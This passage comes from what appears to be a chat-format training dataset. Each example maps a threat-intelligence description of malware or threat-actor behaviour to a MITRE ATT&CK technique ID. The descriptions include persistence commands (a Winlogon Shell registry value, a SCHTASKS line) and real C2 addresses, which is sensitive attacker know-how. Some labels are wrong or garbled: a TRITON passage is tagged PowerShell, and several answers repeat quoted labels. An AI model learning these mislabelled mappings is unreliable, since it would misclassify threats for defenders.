- "content": "T1137.002 - Office Application Startup: Office Test"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gazer can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has used an encoded PowerShell command by a service created by Cobalt Strike for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It then modifies several registry key values to disable the IE browser’s functions such as auto-complete, auto-suggest, etc. The disabled keys are: \"Use FormSuggest\", \"FormSuggest Passwords\", \"FormSuggest PW Ask\" under the sub-key “HKCU\\Software\\Microsoft\\Internet Explorer\\Main”, and \"AutoSuggest\" under the sub-key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\AutoComplete"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has staged archives of collected data on a target's Outlook Web Access (OWA) server."
- },
- {
- "role": "assistant",
- "content": "T1074.002 - Remote Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Matryoshka uses DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla established persistence by adding a Shell value under the Registry key \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\"."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 9: Call to DeleteFileW to remove the :Zone.Identifier Flag from the dropped copy."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to check whether the infected system’s OS is Debian or RHEL/CentOS to determine which cryptocurrency miner it should use."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "regsvr32.exe is a native Windows utility for registering and unregistering DLLs and ActiveX controls in the Windows registry. The script attempts to load the malicious module using regsvr with the run function. Procmon shows the malicious module loaded to the Avast process"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of using ICMP, TCP, and UDP for C2."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tropic Trooper sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JSS Loader has been delivered by phishing emails containing malicious Microsoft Excel attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During FunnyDream, the threat actors used several tools and batch files to map victims' internal networks."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Volgmer can delete files and itself after infection to avoid analysis."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MSTIC has observed NICKEL actors using exploits against unpatched systems to compromise remote access services and appliances. MSTIC has also observed NICKEL perform frequent and scheduled data collection and exfiltration from victim networks"
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can communicate using SOCKS."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used PowerShell scripts for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate has been disguised as a JPG extension to avoid detection as a malicious PE file."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTP, HTTPS, FTP, and FTPS to communicate with the C2 server. can also act as a webserver and listen for inbound HTTP requests through an exposed API."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch has used the WinRAR utility to compress and encrypt stolen files."
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs ipconfig /all and collects the domain name."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hides any strings related to its own indicators of compromise."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EXOTIC LILY has searched for information on targeted individuals on business databases including RocketReach and CrunchBase."
- },
- {
- "role": "assistant",
- "content": "T1597 - Search Closed Sources"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The data is encrypted using a series of XOR and addition operations, followed by decompression using the ZLIB library"
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile. Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile. Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM. This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities. It also has engaged in network reconnaissance against targets of interest to TEMP.Veles. The IP address has been tied to additional malicious activity in support of the TRITON intrusion. This IP address has been used to monitor open-source coverage of TRITON, heightening the probability of an interest by unknown subjects, originating from this network, in TEMP.Veles-related activities. It also has engaged in network reconnaissance against targets of interest to TEMP.Veles. The IP address has been tied to additional malicious activity in support of the TRITON intrusion"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The FunnyDream FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lokibot has decoded and decrypted its stages multiple times using hard-coded keys to deliver the final payload, and has decoded its server response hex string using XOR."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The sample collects the user information including current processes, installed software, system language and time zone. The harvested credentials and user information are then sent back to the C2. Here are some highlights about system information stealing"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali has used the MSI installer to download and execute malicious payloads."
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EKANS uses encoded strings in its process kill list."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT3 obfuscates files or information to help evade defensive measures."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Raindrop used steganography to locate the start of its encoded payload within legitimate 7-Zip code."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa discovered system proxy settings and used them if available."
- },
- {
- "role": "assistant",
- "content": "T1090.001 - Proxy: Internal Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From the main function, the malware invokes a function named eiht_get_update. This function attempts to read a remote file (ret.txt) from andrewka6.pythonanywhere.com that contained the address of the remote command and control server. If that failed, the malware would default to using the hard-coded (albeit encrypted) IP address 167.71.237.219. In order to gather information about the infected host, it invokes a function named: ei_get_host_info …which in turn invokes various macOS APIs such as getlogin and gethostname"
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has set auto-forward rules on victim's e-mail accounts."
- },
- {
- "role": "assistant",
- "content": "T1114.003 - Email Collection: Email Forwarding Rule"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 used NTFS alternate data streams to hide their payloads."
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoisonIvy creates run key Registry entries pointing to a malicious executable dropped to disk."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GreyEnergy can securely delete a file by hooking into the DeleteFileA and DeleteFileW functions in the Windows API."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In 2011, while still at McAfee, he went on to reveal Comment Crew (which he calls Comment Panda) operating alongside Elderwood. It's called that because the group so often uses a technique involving internal software \"comment\" features on web pages as a tool to infiltrate target computers"
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The kernel driver is a commercial product that the attackers are abusing called RawDisk by EldoS Corporation, which provides direct access to files, disks and partitions. It appears that the “drdisk.sys” driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. With the kernel driver installed, the wiper can begin writing to protected system locations, such as the master boot record (MBR) and partition tables of storage volumes. If the wiper is configured with the \"E\" setting, the wiper will encrypt the contents of the file using a random value as a key and the RC4 algorithm. If configured with the \"R\" setting, the wiper will overwrite files with the random values that would be used as a key in \"E"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe', 'T1485 - Data Destruction', 'T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Meteor can attempt to uninstall Kaspersky Antivirus or remove the Kaspersky license; it can also add all files and folders related to the attack to the Windows Defender exclusion list."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nebulae can discover logical drive information including the drive type, free space, and volume information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to delete files off the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BoomBox proceeds to upload the data above (masquerading as a PDF file) to a dedicated-per-victim-system folder in Dropbox. For demonstration purposes, an example HTTP(s) POST request used to upload the file/data to Dropbox is included below"
- },
- {
- "role": "assistant",
- "content": "T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ALL tim nha Chi Ngoc Canada: The shell script containing the main malicious routines - configureDefault.def: The word file displayed during execution"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LAPSUS$ has exploited unpatched vulnerabilities on internally accessible servers including JIRA, GitLab, and Confluence for privilege escalation."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris has used `SCHTASKS /CREATE /SC DAILY /TN StartDVL /TR \"[path to self]\" /ST 10:00` to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RAT is able to wipe event logs."
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "macOS.OSAMiner has used `osascript` to call itself via the `do shell script` command in the Launch Agent `.plist` file."
- },
- {
- "role": "assistant",
- "content": "T1059.002 - Command and Scripting Interpreter: AppleScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a Batch file to automate frequently executed post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Files contained within image files, like mounted ISO files, will not contain the Zone.Identifier Alternate Data Stream (ADS) flag that indicates the files have been downloaded from the internet (so called “mark-of-the-web”) as reported by Didier Stevens."
- },
- {
- "role": "assistant",
- "content": "T1553.005 - Subvert Trust Controls: Mark-of-the-Web Bypass"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater uses various techniques to bypass UAC."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download and upload files to and from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has used Python-based malware to install and spread their coinminer."
- },
- {
- "role": "assistant",
- "content": "T1059.006 - Command and Scripting Interpreter: Python"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carberp has created a hidden file in the Startup folder of the current user."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the showBackupIosFolder function to check for IOS device backups by running ls -la ~/Library/Application\\ Support/MobileSync/Backup/."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For Operation Sharpshooter, the threat actors used the Rising Sun modular backdoor."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending \".locked\" to the filename."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hancitor has used \"CallWindowProc\" and \"EnumResourceTypesA\" to interpret and execute shellcode."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used a DLL that included an XOR-encoded section."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The backdoor installer will drop a normal sidebar.exe file (a Windows Gadget tool, a feature already discontinued by Windows), a malicious loader (in \"C:\\ProgramData\\Apple\\Update\\wab32res.dll\"), and an encrypted configuration file"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the ‘net time' command to check the local time on the target system. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity. Use an advanced endpoint threat detection (AETD) solution to monitor activity on network endpoints. In particular, review network access for use of mobile USB modems on corporate systems"
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can use `odbcconf.exe` to run DLLs on targeted hosts."
- },
- {
- "role": "assistant",
- "content": "T1218.008 - Signed Binary Proxy Execution: Odbcconf"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following the reconnaissance phase, the threat actor attempted to dump credentials stored on the compromised machines. The most common credential stealing tool used by the threat actor was a modified mimikatz that dumps NTLM hashes. The dumped hashes were used to authenticate to other machines via pass the hash"
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Javali can use large obfuscated libraries to hinder detection and analysis."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turla has used \"tracert\" to check internet connectivity."
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware then focuses on corrupting the first 512 bytes, the Master Boot Record (MBR) for every Physical Drive. While that should be enough for the device not to boot again, HermeticWiper proceeds to enumerate the partitions for all possible drives"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "T9000 performs checks for various antivirus and security products during installation."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has used a command line utility and a network scanner written in python."
- },
- {
- "role": "assistant",
